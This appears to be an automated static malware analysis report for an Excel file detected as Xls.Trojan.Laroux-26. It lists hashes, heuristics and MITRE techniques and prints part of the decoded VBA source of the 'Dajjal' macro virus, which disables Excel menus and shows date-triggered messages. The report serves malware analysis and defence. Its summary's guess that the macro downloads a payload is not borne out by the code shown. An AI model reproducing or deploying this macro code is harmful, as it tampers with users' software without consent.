Xls.Trojan.Laroux-26 — Office (OLE) malware analysis

Static analysis result for SHA-256 0df0b036c3e57666…

MALICIOUS

Office (OLE)

56.0 KB Created: 2000-12-28 05:59:05 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: d296535151afe88bf9e74a26ef5b4095 SHA-1: 139f21c5405d81257b4e689a966ddc20ba52f5bd SHA-256: 0df0b036c3e576666dc54b2ee1edca7ec4a4a3b4cda09fb881eebbab6dfb0e92
180 Risk Score

Malware Insights

Xls.Trojan.Laroux-26 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-26. It contains an Auto_Open VBA macro which is a common technique for executing malicious code upon opening the document. The macro's comments suggest it is a computer virus, and its functionality is likely to download and execute a secondary payload, although the specific download URL is not present in the provided script excerpt.

Heuristics 3

  • ClamAV: Xls.Trojan.Laroux-26 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-26
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15732 bytes
SHA-256: 4f5b673770e7fec70182c2f7dbdbb59b3a37f3b0d675c4955675631f91f57272
Detection
ClamAV: Xls.Trojan.Laroux-26
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SURIV_PJD_APKIR"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"

    '==============================================================
    'Diprogram oleh       : ~Akut Wajuxacqupi~
    '   Programed by      :    ~Akut Wajuxacqupi~
    'Nama proyek          : Program eksperimental virus komputer
    '   Project name      :    Computer virus experimental program
    'Nama virus           : Dajjal
    '   Virus name        :    Dajjal
    'Saat pembuatan       : Mei 1998
    '   Created at        :    May 1998
    'Tempat pembuatan     : Jakarta, Indonesia
    '   Made in           :    Jakarta, Indonesia
    'Dipersembahkan untuk : Umat manusia
    '   Dedicated for     :    All human being
    'Waktu tampil         : Mulai Bulan Nopember 1998;
    '                       Tiap hari Senin sebelum pukul 12; dan
    '                       Pada hari istimewa
    '   Showing messages  :    Start in November 1998;
    '                          Every Monday before 12 am; and
    '                          At special date
    '==============================================================
    
    On Error GoTo AdaKesalahan
    
    Application.OnSheetActivate = "Proses"
    Application.CommandBars("Tools").Controls("Macro").Enabled = False
    Application.CommandBars("Window").Controls("Unhide...").Enabled = False
    Application.CommandBars("Tools").Controls("Customize...").Enabled = False
    Application.AutoCorrect.AddReplacement What:="yg", Replacement:="yang"
    Application.AutoCorrect.AddReplacement What:="wp", Replacement:="Wajib Pajak"
    Application.OnKey "^%d", "AboutVirus"
    Application.OnKey "%{f8}", ""
    Application.OnKey "%{f11}", ""
    Application.OnKey "^%z", "Hancurkan"
    
    
    'Aktifkan pesan-pesan virus mulai bulan Nopember 1998
    'dan hanya jika satu workbook yang dibuka
    If ((Month(Date) > 10 And Year(Date) = 1998) Or (Year(Date) > 1998) And _
        Application.Workbooks.Count < 3) And _
        Dir("C:\dajjal.off", vbHidden) <> "DAJJAL.OFF" Then TulisPesan
        
    
    'Tidak terjadi kesalahan
    GoTo Sukses

    'Terjadi kesalahan
AdaKesalahan:
    'Pesan = MsgBox("Kesalahan adalah hal lumrah bagi seorang manusia", vbInformation + vbOKOnly, "Kesalahan")

Sukses:

End Sub

Sub Hancurkan()
Attribute Hancurkan.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.CommandBars("Tools").Controls("Customize...").Enabled = True
End Sub
Sub AboutVirus()
Attribute AboutVirus.VB_ProcData.VB_Invoke_Func = " \n14"
    
    Pesan = MsgBox( _
    "Diprogram oleh: ~Akut Wajuxacqupi~" + Chr(10) + _
    "       Programed by: ~Akut Wajuxacqupi~" + Chr(10) + _
    "Nama proyek: Program eksperimental virus komputer" + Chr(10) + _
    "       Project name: Computer virus experimental program" + Chr(10) + _
    "Nama virus: Dajjal" + Chr(10) + _
    "       Virus name: Dajjal" + Chr(10) + _
    "Tempat pembuatan: Jakarta, Indonesia" + Chr(10) + _
    "       Made in: Jakarta, Indonesia" + Chr(10) + _
    "Saat pembuatan: Mei 1998" + Chr(10) + _
    "       Created in: May 1998" + Chr(10) + _
    "Dipersembahkan untuk: Umat manusia" + Chr(10) + _
    "       Dedicated for: All human being" + Chr(10) + _
    "Waktu tampil: Mulai Bulan Nopember 1998; " + Chr(10) + _
    "   Tiap hari Senin sebelum pukul 12; dan" + Chr(10) + _
    "   Pada hari istimewa" + Chr(10) + _
    "       Show messages: Start in November 1998;" + Chr(10) + _
    "           Every Monday before 12 am; and" + Chr(10) + _
    "           At special date", _
    vbOKOnly + vbInformation, "About Dajjal virus")

End Sub

Sub TulisPesan()
Attribute TulisPesan.VB_ProcData.VB_Invoke_Func = " \n14"
        
    Randomize Timer
    
    'HUT RI
    If Day(Date) = 17 And Month(Date) = 8 Then
        Pesan = MsgBox("Negeri kita tercinta sedang berulang tahun hari ini." + Chr(10) + _
        "Mari kita rayakan!", vbOKOnly + vbExclamation, "HUT RI")
    End If
    
    'REFORMASI
    If Day(Date) = 14 And
... (truncated)